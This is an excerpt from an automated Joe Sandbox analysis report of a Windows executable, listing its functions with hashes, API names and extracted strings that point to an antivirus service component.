                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -
                                                                                        • API String ID: 0-2547889144
                                                                                        • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                                        • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                                                        • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                                        • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                                                        Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -
                                                                                        • API String ID: 0-2547889144
                                                                                        • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                                        • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                                                        • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                                        • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                                                        Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -
                                                                                        • API String ID: 0-2547889144
                                                                                        • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                                        • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                                                        • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                                        • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                                                        Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                                        • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                                                        • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                                        • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                                                        Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                                        • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                                                        • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                                        • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                                                        Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                                        • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                                                        • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                                        • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                                                        Function 00007FFE1A51FD40 Relevance: .0, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                                        • Instruction ID: 59fa7d81a14b79a0ce93f6df39f42e77e019aba0d44b0c8d5ec2b45d14124a3f
                                                                                        • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                                        • Instruction Fuzzy Hash: 4AF0C8B171C6518ADB958F69E402A393BD1E7487D0F8480BFD58C83B14C63C90509F04
                                                                                        Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239timeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 355 140003d35-140003d49 353->355 356 1400039f3-140003a04 #4 354->356 357 140003a09-140003a1a EnterCriticalSection 354->357 356->357 358 140003a67 357->358 359 140003a1c-140003a34 357->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->355
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                                                        • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                                                        • API String ID: 1021822269-3147033232
                                                                                        • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                                        • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                                                        • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                                        • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350
                                                                                        Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                                                        • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                                                        • API String ID: 883923345-381368982
                                                                                        • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                                        • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                                                        • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                                        • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                                                        Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                                                        • String ID:
                                                                                        • API String ID: 1613947383-0
                                                                                        • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                                        • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                                                        • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                                        • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                                                        Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                        • String ID:
                                                                                        • API String ID: 1995290849-0
                                                                                        • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                                        • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                                                        • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                                        • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                                                        Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                        • String ID:
                                                                                        • API String ID: 1995290849-0
                                                                                        • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                                        • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                                                        • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                                        • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                                                        Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                                                        • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                        • API String ID: 93015348-1041928032
                                                                                        • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                                        • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                                                        • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                                        • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                                                        Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                                                        • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                                                        • API String ID: 3682727354-300733478
                                                                                        • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                                        • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                                                        • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                                        • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                                                        Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                                                        • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                                                        • API String ID: 2587151837-1427723692
                                                                                        • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                                        • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                                                        • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                                        • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                                                        Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                                                        • String ID: SetDllDirectoryW$kernel32.dll
                                                                                        • API String ID: 3184163350-3826188083
                                                                                        • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                                        • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                                                        • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                                        • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                                                        Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocProcesslstrlen
                                                                                        • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                        • API String ID: 3424473247-996641649
                                                                                        • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                                        • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                                                        • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                                        • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                                                        Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1775797328-0
                                                                                        • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
